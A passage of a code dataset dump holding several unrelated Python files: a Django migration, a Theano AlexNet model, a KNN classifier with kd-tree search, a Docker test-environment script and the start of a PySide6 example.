{"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 49, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 38, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 62, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 90, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 91, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 93, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 97, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 97, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 108, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 110, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 117, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 125, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 164, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 171, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 185, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 196, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 197, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 223, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 231, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 231, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 257, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 272, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 276, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 282, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 282, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 283, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 284, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 297, "usage_type": "name"}, {"api_name": "requests.delete", "line_number": 310, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 334, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 340, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 344, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 345, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 346, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 384, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 409, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 416, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 416, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 420, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 420, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 430, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 431, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 433, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 442, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 445, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 470, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 472, "usage_type": "name"}]} +{"seq_id": "209033545", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('properties', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='cfModel',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=50)),\n ('startDate', models.DateTimeField()),\n ('periods', models.PositiveIntegerField()),\n ('VisibleToPublic', models.BooleanField()),\n ('VisibleToCompany', models.BooleanField()),\n ],\n ),\n migrations.CreateModel(\n name='GrowthRate',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('modelPeriod', models.IntegerField(null=True)),\n ('modelDate', models.DateTimeField()),\n ('iteration', models.PositiveIntegerField(null=True)),\n ('amount', models.DecimalField(max_digits=5, decimal_places=4)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='GrowthRateCategory',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=50)),\n ('notes', models.TextField()),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='growthrate',\n name='GrowthRateCategory',\n field=models.ForeignKey(to='cashflows.GrowthRateCategory'),\n ),\n migrations.AddField(\n model_name='cfmodel',\n name='GrowthRateCategories',\n field=models.ManyToManyField(to='cashflows.GrowthRateCategory'),\n ),\n migrations.AddField(\n model_name='cfmodel',\n name='building',\n field=models.ForeignKey(to='properties.segment'),\n ),\n ]\n", "sub_path": "cashflows/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 2283, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "244625464", "text": "import sys, os\nimport numpy\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import downsample\nfrom theano.tensor.signal import pool\nfrom theano.tensor.nnet import conv2d\n\n\nclass ConvLayer(object):\n \"\"\" Layer of a convolution \"\"\"\n\n def __init__(self, input, filter_shape, image_shape, f_params_w, f_params_b, subsample=(1,1), bmode =0,\n params_path = 'parameters_releasing'):\n \"\"\"\n\n :type input: theano.tensor.dtensor4\n :param input: symbolic image tensor, of shape image_shape\n\n :type filter_shape: tuple or list of length 4\n :param filter_shape: (number of filters, num input feature maps,\n filter height, filter width)\n\n :type image_shape: tuple or list of length 4\n :param image_shape: (batch size, num input feature maps,\n image height, image width)\n\n \n \"\"\"\n \n assert image_shape[1] == filter_shape[1]\n self.input = input\n \n assgn_w=np.transpose(np.load(os.path.join(params_path,f_params_w)),(3,0,1,2))\n \n self.W = theano.shared(\n np.asarray(\n assgn_w,\n dtype=theano.config.floatX\n ),\n borrow=True\n )\n\n # the bias is a 1D tensor -- one bias per output feature map\n assgn_b= np.load(os.path.join(params_path,f_params_b))\n #print (assgn_b.shape)\n self.b = theano.shared(\n np.asarray(\n assgn_b,\n dtype=theano.config.floatX\n ),\n borrow=True\n )\n\n # convolve input feature maps with filters\n\n conv_out = conv2d(\n input=input,\n filters=self.W,\n filter_shape=filter_shape,\n input_shape=image_shape,\n subsample=subsample,\n border_mode=bmode,\n filter_flip=True\n )\n\n self.output = T.nnet.relu(conv_out + self.b.dimshuffle('x', 0, 'x', 'x'))\n \n\n\n # store parameters of this layer\n self.params = [self.W, self.b]\n\n # keep track of model input\n self.input = input\n\n### Weights were downloaded from: https://dataverse.scholarsportal.info/dataset.xhtml?persistentId=hdl:10864/10911\n\n\nclass alexNet():\n def __init__(self,params_path = 'parameters_releasing',batch_size=1, learning_rate=0.1,\n weights=None,bias=None,image_size=(1,3,227,227)):\n \n\n n,d,w,h=image_size\n\n x = T.matrix('x') # the data is presented as rasterized images\n\n\n \n\n\n\n \n self.layer0_input = x.reshape((batch_size, 3, 227, 227))\n \n self.layer0 = ConvLayer(\n input=self.layer0_input,\n image_shape=(batch_size, 3, 227, 227),\n filter_shape=(96, 3, 11, 11),\n f_params_w='W_0_65.npy',\n f_params_b='b_0_65.npy',\n subsample=(4,4),\n bmode=0,\n params_path = params_path\n )\n \n\n \n self.pool0=pool.pool_2d(\n input=self.layer0.output,\n ds=(3,3),\n ignore_border=True,\n st=(2,2)\n )\n \n \n self.layer1_0 = ConvLayer(\n input=self.pool0[:,:96/2,:,:],\n image_shape=(batch_size, 96/2, 27, 27),\n filter_shape=tuple(np.asarray([256/2, 96/2, 5, 5])),\n f_params_w='W0_1_65.npy',\n f_params_b='b0_1_65.npy',\n subsample=(1,1),\n bmode=2,\n params_path = params_path\n )\n \n self.layer1_1 = ConvLayer(\n input=self.pool0[:,96/2:,:,:],\n image_shape=(batch_size, 96/2, 27, 27),\n filter_shape=tuple(np.asarray([256/2, 96/2, 5, 5])),\n f_params_w='W1_1_65.npy',\n f_params_b='b1_1_65.npy',\n subsample=(1,1),\n bmode=2,\n params_path = params_path\n )\n \n self.layer1_output= T.concatenate([self.layer1_0.output, self.layer1_1.output], axis=1)\n \n self.pool1=pool.pool_2d(\n input=self.layer1_output,\n ds=(3,3),\n ignore_border=True,\n st=(2,2)\n )\n \n \n self.layer2 = ConvLayer(\n input=self.pool1,\n image_shape=(batch_size, 256, 13, 13),\n filter_shape=(384, 256, 3, 3),\n f_params_w='W_2_65.npy',\n f_params_b='b_2_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n \n self.layer3_0 = ConvLayer(\n input=self.layer2.output[:,:384/2,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([384/2, 384/2, 3, 3])),\n f_params_w='W0_3_65.npy',\n f_params_b='b0_3_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer3_1 = ConvLayer(\n input=self.layer2.output[:,384/2:,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([384/2, 384/2, 3, 3])),\n f_params_w='W1_3_65.npy',\n f_params_b='b1_3_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer3_output= T.concatenate([self.layer3_0.output, self.layer3_1.output], axis=1)\n \n self.layer4_0 = ConvLayer(\n input=self.layer3_output[:,:384/2,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([256/2, 384/2, 3, 3])),\n f_params_w='W0_4_65.npy',\n f_params_b='b0_4_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer4_1 = ConvLayer(\n input=self.layer3_output[:,384/2:,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([256/2, 384/2, 5, 5])),\n f_params_w='W1_4_65.npy',\n f_params_b='b1_4_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer4_output= T.concatenate([self.layer4_0.output, self.layer4_1.output], axis=1)\n \n self.pool4=pool.pool_2d(\n input=self.layer4_output,\n ds=(3,3),\n ignore_border=True,\n st=(2,2),\n )\n\n self.x = x\n print (\"Alexnet built\")\n\n \n \n\n", "sub_path": "alexnet.py", "file_name": "alexnet.py", "file_ext": "py", "file_size_in_byte": 6638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.use", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "theano.shared", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 43, "usage_type": "call"}, {"api_name": "theano.config", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "theano.shared", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 54, "usage_type": "call"}, {"api_name": "theano.config", "line_number": 56, "usage_type": "attribute"}, {"api_name": "theano.tensor.nnet.conv2d", "line_number": 63, "usage_type": "call"}, {"api_name": "theano.tensor.nnet.relu", "line_number": 73, "usage_type": "call"}, {"api_name": "theano.tensor.nnet", "line_number": 73, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 73, "usage_type": "name"}, {"api_name": "theano.tensor.matrix", "line_number": 93, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 93, "usage_type": "name"}, {"api_name": "theano.tensor.signal.pool.pool_2d", "line_number": 116, "usage_type": "call"}, {"api_name": "theano.tensor.signal.pool", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 138, "usage_type": "call"}, {"api_name": "theano.tensor.concatenate", "line_number": 146, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 146, "usage_type": "name"}, {"api_name": "theano.tensor.signal.pool.pool_2d", "line_number": 148, "usage_type": "call"}, {"api_name": "theano.tensor.signal.pool", "line_number": 148, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 182, "usage_type": "call"}, {"api_name": "theano.tensor.concatenate", "line_number": 190, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 190, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 206, "usage_type": "call"}, {"api_name": "theano.tensor.concatenate", "line_number": 214, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 214, "usage_type": "name"}, {"api_name": "theano.tensor.signal.pool.pool_2d", "line_number": 216, "usage_type": "call"}, {"api_name": "theano.tensor.signal.pool", "line_number": 216, "usage_type": "name"}]} +{"seq_id": "347532955", "text": "from collections import defaultdict\nfrom numpy import *\nimport heapq\nimport h5py\nimport pca_evaluation\nimport confusion_matrix\n\"\"\"KNN classifier implemented by brute-force and kd-tree\n\nThis module implement a KNN classifier\n\n\"\"\"\n\n\nclass TreeNode(object):\n def __init__(self, coordinates,label):\n self.coordinates = coordinates\n self.label = label\n\n def set_label(self,label):\n self.label = label\n\n\nclass kNN(object):\n\n def __init__(self, k, algorithm='brute-force'):\n \"\"\"initialize a k-nearest neighbor classifier.\n\n Args:\n dataset(list): a list of pair (arr,label), while arr is n components\n of dataset and label is the category.\n k(int): the number of nearest neighbour\n algorithm(str): brute-force / k_dtree\n \"\"\"\n\n self.train_set = []\n self.kd_tree = []\n self.k = k\n self.algorithm = algorithm\n self.dim = 0\n\n\n def manhattan_distance(self,A,B):\n \"\"\" manhattan distance\n\n Args:\n A(numpy.array) : img1\n B(numpy.array) : img2\n\n Returns manhattan distance of two images\n \"\"\"\n\n dist = sum(absolute(A-B),axis=0)\n return dist\n\n def make_kd_tree(self, train_nodes, dim, index=0):\n \"\"\" construct_kd_tree\n\n Args:\n train_nodes(numpy.array): a 2D array (30000, 75) represent images\n dim(int): dimension of the point (75 in this case)\n index(int): index for traverse the tree\n\n Returns manhattan distance of two images\n \"\"\"\n\n # Select axis based on depth so that axis cycles through all valid values\n train_nodes.sort(key=lambda x: x[index]) # Sort point list\n index = (index + 1) % dim\n # choose median as pivot element\n _median = len(train_nodes) >> 1\n\n # Create node and construct subtree recursively\n return (\n self.make_kd_tree(train_nodes[: _median], dim, index),\n self.make_kd_tree(train_nodes[_median + 1:], dim, index),train_nodes[_median])\n\n def get_knn_kdtree(self, kd_node, point, return_distances=True, i=0, heap=None):\n \"\"\" construct_kd_tree\n\n Args:\n kd_node(TreeNode): the root of k_dtree\n dim(int): dimension of the point (75 in this case)\n point(numpy.array) : an array represents test image\n\n Returns manhattan distance of two images\n \"\"\"\n\n is_root = not heap\n if is_root:\n heap = [] # construct a bounded priority queue.\n if kd_node:\n dist = self.manhattan_distance(point, kd_node[2])\n dx = kd_node[2][i] - point[i]\n if len(heap) < self.k:\n heapq.heappush(heap, (-dist, kd_node[2]))\n elif dist < -heap[0][0]:\n heapq.heappushpop(heap, (-dist, kd_node[2]))\n i = (i + 1) % self.dim\n # Goes into the left branch, and then the right branch if needed\n self.get_knn_kdtree(kd_node[dx < 0], point,return_distances, i, heap)\n if dx * dx < -heap[0][0]: # -heap[0][0] is the largest distance in the heap\n self.get_knn_kdtree(kd_node[dx >= 0], point, return_distances, i, heap)\n if is_root:\n neighbors = sorted((-h[0], h[1]) for h in heap)\n return neighbors if return_distances else [n[1] for n in neighbors]\n\n def get_prediction(self, neighbours):\n \"\"\" get the majority of votes in k nearest neighbours\n\n Args:\n neighbours(list) : a list of category of K nearest neighbours\n\n Returns:\n majority of category of nearest neighbours\n \"\"\"\n counter = defaultdict(int)\n for votes in neighbours:\n counter[votes] += 1 # collect votes of each neighbour\n\n majority = max(counter.values()) # get the majority votes\n # find the category of the majority votes\n for k, v in counter.items():\n if v == majority:\n return k\n\n def classify(self, point):\n \"\"\" get the majority of votes in k nearest neighbours\n\n Args:\n point(numpy.array) : an array represents test image\n\n Returns:\n prediction of category of a image\n \"\"\"\n if self.algorithm == 'k_dtree':\n result =[]\n result.append(self.get_knn_kdtree(self.kd_tree, point,\n return_distances=True, i=0, heap=None))\n neighbours = []\n for node in result[0]:\n neighbours.append(node[0])\n return self.get_prediction(result)\n\n else:\n temp_imgs = self.train_set[:] # a temp array to store potential image\n k_nearest_neighbors = []\n while len(k_nearest_neighbors) < self.k:\n # construct a distance matrix through brute-force\n distance_matrix = [self.manhattan_distance(x[0], point) for x in temp_imgs]\n # Find the nearest neighbor.\n best_distance = min(distance_matrix)\n index = distance_matrix.index(best_distance)\n k_nearest_neighbors.append(temp_imgs[index])\n\n # Remove the nearest neighbour from the temp image list.\n del temp_imgs[index]\n\n # get prediction through voting.\n prediction = self.get_prediction([value[1] for value in k_nearest_neighbors])\n return prediction\n\n def fit(self, redMat, label):\n \"\"\" fit the label and traning data to KNN classifier\n\n Args:\n redMat(numpy.array): trainning set\n label(numpy.array): label\n \"\"\"\n if self.algorithm == 'brute-force':\n for i in range(len(redMat)):\n self.train_set.append((redMat[i, :], label[i]))\n elif self.algorithm == 'k_dtree':\n trian_set_node = []\n self.dim = redMat.shape[1]\n for i in range(len(redMat)):\n tn = TreeNode(redMat[i, :],label[i]) # construct a tree node\n trian_set_node.append(tn) # fit tree node to knn classifier\n self.kd_tree = self.make_kd_tree(trian_set_node, self.dim)\n else:\n print('invalid arguments.')\n\n\ndef main():\n pred_array = []\n with h5py.File('./data/images_training.h5', 'r') as H:\n data = copy(H['data'])\n with h5py.File('./data/labels_training.h5', 'r') as H:\n label = copy(H['label'])\n with h5py.File('./data/images_testing.h5', 'r') as H:\n test = copy(H['data'])\n with h5py.File('./data/labels_testing_2000.h5', 'r') as H:\n test_label = copy(H['label'])\n train_X = data.reshape(30000, 784)\n test_X = test.reshape(5000, 784)\n test_X = test_X[:2000]\n redMatTest = pca_evaluation.transform(test_X)\n redMat = pca_evaluation.transform(train_X)\n classifier = kNN(5,'brute-force')\n classifier.fit(redMat, label)\n count = 0\n mycount =0\n for i in range(len(redMatTest)):\n if classifier.classify(redMatTest[i]) == test_label[i]:\n print('yes', test_label[i],' mycount: ', mycount)\n count += 1\n mycount += 1\n pred_array.append(classifier.classify(redMatTest[i]))\n else:\n print('no')\n mycount += 1\n pred_array.append(classifier.classify(redMatTest[i]))\n print(count)\n confusion_matrix.confusion_matrix_fashion(test_label, pred_array)\n\n\nmain()\n", "sub_path": "knn_naive.py", "file_name": "knn_naive.py", "file_ext": "py", "file_size_in_byte": 7588, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "heapq.heappush", "line_number": 95, "usage_type": "call"}, {"api_name": "heapq.heappushpop", "line_number": 97, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 116, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 185, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 187, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 189, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 191, "usage_type": "call"}, {"api_name": "pca_evaluation.transform", "line_number": 196, "usage_type": "call"}, {"api_name": "pca_evaluation.transform", "line_number": 197, "usage_type": "call"}, {"api_name": "confusion_matrix.confusion_matrix_fashion", "line_number": 213, "usage_type": "call"}]} +{"seq_id": "372863949", "text": "#!/usr/bin/env python2\nimport sh\nimport subprocess\nimport sys\nimport kolab\nfrom kolab import build\nimport kolabpopulated\nfrom kolabpopulated import build\nfrom kolabpopulated import run\nimport kontact\nfrom kontact import build\nfrom kontact import run\n\nimport settings\nimport dockerutils\n\ndef buildImage(repo, tag, rebuild, builder):\n image = dockerutils.findImage(repo, tag)\n if not image or rebuild:\n print(\"building image: \" + repo + \":\" + tag)\n builder()\n image = dockerutils.findImage(repo, tag)\n print(\"Image is ready: {}:{}\".format(repo, tag))\n return image\n\ndef startContainer(name, runner):\n container=dockerutils.findContainer(name)\n if not container:\n runner()\n container = dockerutils.findContainer(name)\n print(\"Container is ready: {} {}\".format(name, container))\n return container\n\ndef main(command, argv):\n if command == \"build\":\n target = argv[2]\n if target == \"server\":\n dataset = argv[3]\n baseimage = buildImage(settings.REPOSITORY, \"base\", False, lambda: kolab.build.main)\n populatedbuild = buildImage(settings.REPOSITORY, settings.populatedTag(dataset), False, lambda: kolabpopulated.build.main(dataset))\n if target == \"client\":\n buildImage(\"kontact\", \"john\", False, lambda: kontact.build.main(\"john\"))\n if command == \"start\":\n print(\"start\")\n dataset = argv[2]\n clientconfigset = argv[3]\n container = startContainer(\"{}:{}\".format(settings.REPOSITORY, settings.populatedTag(dataset)), lambda: kolabpopulated.run.main(dataset))\n kontact.run.main(container, clientconfigset)\n sh.docker.kill(container)\n sh.docker.rm(container)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv)\n\n# * build $env\n# ** build server with defined dataset\n# ** build client(s)\n\n# * start $env\n# ** start server\n# ** start client(s) with link to server\n\n\n\n", "sub_path": "testenv.py", "file_name": "testenv.py", "file_ext": "py", "file_size_in_byte": 1938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dockerutils.findImage", "line_number": 18, "usage_type": "call"}, {"api_name": "dockerutils.findImage", "line_number": 22, "usage_type": "call"}, {"api_name": "dockerutils.findContainer", "line_number": 27, "usage_type": "call"}, {"api_name": "dockerutils.findContainer", "line_number": 30, "usage_type": "call"}, {"api_name": "settings.REPOSITORY", "line_number": 39, "usage_type": "attribute"}, {"api_name": "kolab.build", "line_number": 39, "usage_type": "attribute"}, {"api_name": "settings.REPOSITORY", "line_number": 40, "usage_type": "attribute"}, {"api_name": "settings.populatedTag", "line_number": 40, "usage_type": "call"}, {"api_name": "kolabpopulated.build.main", "line_number": 40, "usage_type": "call"}, {"api_name": "kolabpopulated.build", "line_number": 40, "usage_type": "attribute"}, {"api_name": "kontact.build.main", "line_number": 42, "usage_type": "call"}, {"api_name": "kontact.build", "line_number": 42, "usage_type": "attribute"}, {"api_name": "settings.REPOSITORY", "line_number": 47, "usage_type": "attribute"}, {"api_name": "settings.populatedTag", "line_number": 47, "usage_type": "call"}, {"api_name": "kolabpopulated.run.main", "line_number": 47, "usage_type": "call"}, {"api_name": "kolabpopulated.run", "line_number": 47, "usage_type": "attribute"}, {"api_name": "kontact.run.main", "line_number": 48, "usage_type": "call"}, {"api_name": "kontact.run", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sh.docker.kill", "line_number": 49, "usage_type": "call"}, {"api_name": "sh.docker", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sh.docker.rm", "line_number": 50, "usage_type": "call"}, {"api_name": "sh.docker", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}]} +{"seq_id": "208749356", "text": "import sys\n\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QPushButton\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n btn = QPushButton(\"Press me\")\n btn.setCheckable(True)\n btn.clicked.connect(\n lambda checked: self.button_clicked(checked, btn)\n )\n\n self.setCentralWidget(btn)\n\n def button_clicked(self, 